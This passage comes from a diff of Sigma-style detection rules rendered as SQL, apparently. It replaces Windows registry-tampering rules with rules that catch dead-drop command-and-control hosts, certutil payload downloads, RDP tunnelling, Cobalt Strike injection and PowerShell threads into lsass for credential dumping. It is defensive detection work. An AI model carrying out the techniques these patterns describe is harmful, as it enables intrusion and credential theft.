"Sorina Ionescu", "tags": [ - "attack.persistence" + "attack.command_and_control", + "attack.t1102", + "attack.t1102.001" ], "falsepositives": [ - "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" + "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((Initiated = 'true' AND (DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\'))) AND NOT (((NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MsSense.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Engine.exe' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_mycomputer.yml" + "filename": "net_connection_win_dead_drop_resolvers.yml" }, { - "title": "Service Binary in Suspicious Folder", - "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "title": "RDP to HTTP or HTTPS Target Ports", + "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", "status": "experimental", - "description": "Detect the creation of a service with a service binary located in a suspicious directory", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" ], - "filename": "registry_set_creation_service_susp_folder.yml" + "filename": "net_connection_win_rdp_to_http.yml" }, { - "title": "Adwind RAT / JRAT - Registry", - "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", + "title": "Connection Initiated Via Certutil.EXE", + "id": "0dba975d-a193-4ed1-a067-424df57570d1", "status": "experimental", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "description": "Detects a network connection initiated by the certutil.exe tool.\nAttackers can abuse the utility in order to download malware or additional payloads.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.command_and_control", + "attack.t1105" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND NewValue LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '135', '443', '445'))" ], - "filename": "registry_set_mal_adwind.yml" + "filename": "net_connection_win_certutil_initiated_connection.yml" }, { - "title": "Potential Credential Dumping Attempt Using New NetworkProvider - REG", - "id": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", - "status": "experimental", - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Wuauclt Network Connection", + "id": "c649a6c7-cd8c-4a78-9c04-000fc76df954", + "status": "test", + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Other legitimate network providers used and not filtred in this rule" + "Legitimate use of wuauclt.exe over the network." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WebClient\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanWorkstation\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\RDPNP\\\\NetworkProvider%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%wuauclt%' ESCAPE '\\' AND NOT (((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\UpdateDeploy.dll /ClassId %' ESCAPE '\\')))" ], - "filename": "registry_set_new_network_provider.yml" + "filename": "net_connection_win_wuauclt_network_connection.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features - Registry", - "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "title": "Suspicious Epmap Connection", + "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", "status": "experimental", - "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", + "author": "frack113, Tim Shelton (fps)", "tags": [ - "attack.defense_evasion" + "attack.lateral_movement" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" ], - "filename": "registry_set_turn_on_dev_features.yml" + "filename": "net_connection_win_susp_epmap.yml" }, { - "title": "NET NGenAssemblyUsageLog Registry Key Tamper", - "id": "28036918-04d3-423d-91c0-55ecf99fb892", - "status": "experimental", - "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", + "title": "Msiexec Initiated Connection", + "id": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", + "status": "test", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1218.007" ], "falsepositives": [ - "Unknown" + "Legitimate msiexec over networks" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Initiated = 'true' AND NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\')" ], - "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" + "filename": "net_connection_win_msiexec.yml" }, { - "title": "ETW Logging Disabled For SCM", - "id": "4f281b83-0200-4b34-bf35-d24687ea57c2", + "title": "Suspicious Non-Browser Network Communication With Reddit API", + "id": "d7b09985-95a3-44be-8450-b6eadf49833e", "status": "experimental", - "description": "Detects changes to the \"TracingDisabled\" key in order to disable ETW logging for services.exe (SCM)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an a non-browser process interacting with the Reddit API which could indicate use of a covert C2 such as RedditC2", + "author": "Gavin Knapp", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.command_and_control", + "attack.t1102" ], "falsepositives": [ - "Unknown" + "Legitimate applications communicating with the Reddit API e.g. web browsers not in the exclusion list, app with an RSS etc." ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Tracing\\\\SCM\\\\Regular\\\\TracingDisabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (DestinationHostname LIKE '%reddit.com%' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "registry_set_services_etw_tamper.yml" + "filename": "net_connection_win_reddit_api_non_browser_access.yml" }, { - "title": "Potential Persistence Via CHM Helper DLL", - "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "title": "Python Initiated Connection", + "id": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", "status": "experimental", - "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "Unknown" + "Legitimate python script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Initiated = 'true' AND NewProcessName LIKE '%python%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda-script.py%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\python.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\jupyter-notebook-script.py%' ESCAPE '\\') OR (DestinationIp = '127.0.0.1' AND SourceIp = '127.0.0.1')))" ], - "filename": "registry_set_persistence_chm.yml" + "filename": "net_connection_win_python.yml" }, { - "title": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification", - "id": "480421f9-417f-4d3b-9552-fd2728443ec8", + "title": "Script Initiated Connection", + "id": "08249dc0-a28d-4555-8ba5-9255a198e08c", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use script to download malicious payloads.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Legitimate scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\')) AND NOT ((NewValue LIKE '(Empty)' ESCAPE '\\' OR NewValue LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Initiated = 'true' AND (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\'))" ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" + "filename": "net_connection_win_script.yml" }, { - "title": "RDP Sensitive Settings Changed to Zero", - "id": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", + "title": "CobaltStrike Process Injection", + "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", "status": "test", - "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.\n", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", + "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1112" + "attack.t1055.001" ], "falsepositives": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND (TargetObject LIKE '%\\\\fDenyTSConnections' ESCAPE '\\' OR TargetObject LIKE '%\\\\fSingleSessionPerUser' ESCAPE '\\' OR TargetObject LIKE '%\\\\UserAuthentication' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\')" ], - "filename": "registry_set_terminal_server_suspicious.yml" + "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" }, { - "title": "Wow6432Node Classes Autorun Keys Modification", - "id": "18f2065c-d36c-464a-a748-bcf909acb2e3", - "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Remote Thread Creation Ttdinject.exe Proxy", + "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", + "status": "experimental", + "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" + "SELECT * FROM logs WHERE SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\'" ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node_classes.yml" + "filename": "create_remote_thread_win_ttdinjec.yml" }, { - "title": "Disable PUA Protection on Windows Defender", - "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", + "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", + "id": "fb656378-f909-47c1-8747-278bf09f4f4f", "status": "experimental", - "description": "Detects disabling Windows Defender PUA protection", - "author": "Austin Songer @austinsonger", + "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" + "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", - "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", - "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Bumblebee Remote Thread Creation", + "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "status": "experimental", + "description": "Detects remote thread injection events based on action seen used by bumblebee", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue IN ('0', 'DWORD (0x00000000)'))))" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_dot_net_etw_tamper.yml" + "filename": "create_remote_thread_win_bumblebee.yml" }, { - "title": "Session Manager Autorun Keys Modification", - "id": "046218bd-e0d8-4113-a3c3-895a12b2b298", - "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Remote Thread Creation in Suspicious Targets", + "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", + "status": "experimental", + "description": 